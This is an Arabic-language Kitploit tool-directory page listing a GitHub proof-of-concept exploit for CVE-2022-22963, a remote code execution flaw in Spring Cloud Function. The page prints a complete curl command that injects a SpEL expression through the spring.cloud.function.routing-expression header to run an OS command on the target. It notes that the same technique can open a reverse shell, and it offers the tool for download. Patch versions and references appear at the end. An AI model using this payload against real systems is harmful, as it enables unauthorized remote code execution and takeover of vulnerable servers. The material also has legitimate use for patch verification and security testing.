Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22963 | Kitploit
أدوات/GitHubGitHub/puckiestyle/cve-2022-22963
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرة
GitHubpuckiestyle/cve-2022-22963

CVE-2022-22963

عرض المستودع
11منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-22963

CVE-2022-22963 PoC

تم تعديله قليلاً للترجمة الإنجليزية واكتشاف https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . بشكل افتراضي، يتم تنفيذ whoami على الهدف ويتم إنشاء ملف vulnerable.txt يحتوي على عناوين URL المعرضة للخطر.

استغلال الثغرة سهل جداً. فيما يلي أمر curl الموثق لاستغلال الثغرة.

curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

باستخدام أمر curl هذا، من السهل إنشاء ملف على نظام التشغيل، ولكن يمكن استخدامه أيضاً لفتح شيل عكسي على المضيف أو الحاوية المعرضين للخطر.

إذا كنت متأثراً بـ CVE-2022-22963، فيجب عليك تحديث التطبيق إلى أحدث الإصدارات 3.1.7 و3.2.3.

مزيد من المعلومات

https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52

تنزيل الأداة